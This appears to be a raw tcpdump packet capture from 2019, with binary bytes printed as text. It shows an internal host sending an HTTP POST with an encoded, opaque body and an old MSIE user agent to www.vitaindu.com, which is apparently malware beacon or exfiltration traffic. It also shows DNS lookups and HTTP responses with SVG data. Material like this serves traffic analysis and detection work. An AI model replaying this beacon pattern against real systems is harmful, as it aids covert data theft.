E….q@….+
..e:@…k.P….(.EXP…….POST / HTTP/1.1
Accept: /
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 520
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.vitaindu.com
Cache-Control: no-cache

8IlD6Hp/pQBUVUU1HQiLqL0qEQfqhORoTjln6RJOQ15jryfneNJiY86EOVLCoqU8bm0OsgXpA0255OV/bAT01clkJeyVjje3bxnPyOvfUsPdp3RPMckUExFs8ujM0HXhFPAwBD3zV8qMRTWUMmJ6279Vl4oR4y8nMYNUzUT6wR28tmL6c8XsaVi4OBQu2Nq/IKf6OeD7IWIFGjE0V7Z38R/syLDaPfmBm0j04GoUIPqmB01zH2k/Br0302lD9sG/tg3odcCXvrktL/YlCBy4NfihYgr8CxaZa4HPM1oVPyusFQHhfw9DDZ/X7aFC+nL8KeKhCK3RtjW4/4McUWA/fw3thufPiTO+fU6adClg6cz69ImGjn9e7M5+A+gcNHnLWNCqkDLoGPRFzTRjKk6Q9hbQQeX/ZidGdK0i+u1ldp2Btm89r0Ct0WSdAigO04vXdHZzaLphNqT/N7liOfi1IT4tX4U+0diO4uC+X699Z6Qf+DftG+NLC4Je+8Wpm+/6+HnqxHQ=
2019-07-29 13:00:59.699603 IP 58.64.191.148.80 > 10.7.29.101.49259: Flags [.], ack 756, win 64240, length 0
E..(……h.:@..
..e.P.k(.EX….P…….
2019-07-29 13:00:59.782318 IP 172.16.5.2.53 > 10.7.29.101.58389: 12756 1/2/2 A 210.140.73.39 (142)
E……………
..e.5….O.1…………www.ex-olive.com……………….I’………….ns01.telewave.ad.jp…………..ns01.epressd.O._…………JR.>………..z.2
2019-07-29 13:00:59.783153 IP 10.7.29.101.49262 > 210.140.73.39.80: Flags [S], seq 3843601751, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.r@….2
..e..I’.n.P…W…… ……………..
2019-07-29 13:00:59.819475 IP 157.7.107.91.80 > 10.7.29.101.49255: Flags [P.], seq 13821:15203, ack 811, win 64240, length 1382: HTTP
E………T…k[
..e.P.g)…..NSP…….2.528c.494-.542.973-1.114 1.5-1.716.449-.544.869-1.111 1.257-1.7l.15-.226c.329-.481.659-.983.988-1.505.329-.522.599-.963.808-1.324l.4-.692c1.607-2.889 2.963-5.91 4.055-9.03 2.459-7.089 3.861-14.502 4.16-22 0-.773.03-1.556.09-2.348 7.811 2.273 17.1 5.433 20.726 8.157 2.257 2 4.155 19.52 5.427 42.428h3.666c-1.332-21.91-3.381-42.477-7.013-45.182-4.658-3.512-16.387-7.25-24.858-9.593l-8.558-4.257c-.674-.339-1.488-.219-2.035.3l-5.791 5.523-4.25 4.034-4.19-4.079-5.731-5.569c-.54-.53-1.355-.662-2.035-.331l-8.784 4.289c-8.47 2.273-20.022 5.87-24.646 9.286-3.685 2.715-5.645 23.414-6.68 45.574h3.652zm57.856-53.069l.628-.783.284-.271 1.18-1.128.254.12 3.906 1.957 2.918 1.5v.135l-4.744 12.04-8.694-5.794-2.32-1.5 6.588-6.276zm-28.013 1.159l2.993-1.5 3.846-1.881.21-.06.09.075 1.407 1.37h.075l.569.557 6.51 6.366-2.245 1.5-8.829 5.779-4.621-12.04-.005-.166zm2.14 15.577c.194.505.606.894 1.12 1.061.514.167 1.076.092 1.529-.203l10.475-6.893 3.292-2.152 3.307 2.243 10.475 6.923c.45.303 1.013.386 1.53.225.518-.161.935-.548 1.134-1.053l1.766-4.515c-.686 4.963-1.905 9.837-3.636 14.539-.932 2.49-2.053 4.905-3.352 7.224l-.389.662-.7 1.174c-.359.572-.718 1.1-1.062 1.61l-.21.3c-.344.5-.7.963-1.047 1.4l-.434.527c-.344.406-.673.8-1.018 1.159-.689.743-1.429 1.436-2.215 2.075h-8.863c-.765-.637-1.485-1.326-2.155-2.062-.359-.391-.7-.8-1.062-1.249l-.374-.452c-.359-.467-.733-.963-1.092-1.505l-.1
2019-07-29 13:00:59.819587 IP 10.7.29.101.49255 > 157.7.107.91.80: Flags [.], ack 15203, win 62858, length 0
E..(.s@…..
..e..k[.g.P..NS)..%P….B..
2019-07-29 13:00:59.820412 IP 157.7.107.91.80 > 10.7.29.101.49255: Flags [P.], seq 15203:16585, ack 811, win 64240, length 1382: HTTP
E………T…k[
..e.P.g)..%..NSP…….5-.226c-.374-.542-.733-1.1-1.107-1.7l-.434-.722c-.209-.346-.418-.707-.629-1.084-1.273-2.322-2.369-4.737-3.277-7.224-1.852-5.166-3.093-10.53-3.7-15.984l2.278 5.902zm49.653 36.333l.1-25.993c.016-.483-.162-.953-.494-1.305-.331-.351-.79-.553-1.272-.561-.239-.011-.478.03-.7.12-.678.284-1.115.951-1.107 1.686v26.053h3.473zm-36.288-26.189c.328 1.337 1.526 2.277 2.903 2.277s2.575-.94 2.903-2.277c.157-.858-.076-1.741-.636-2.409-.558-.666-1.384-1.047-2.253-1.038l.075.015c-.885-.038-1.74.328-2.322.996-.582.668-.829 1.564-.67 2.436zm2.946 6.2v.015c-.968-.014-1.88.452-2.437 1.244-.556.792-.685 1.808-.343 2.714.456 1.128 1.552 1.867 2.769 1.867s2.313-.739 2.769-1.867c.058-.152.103-.308.13: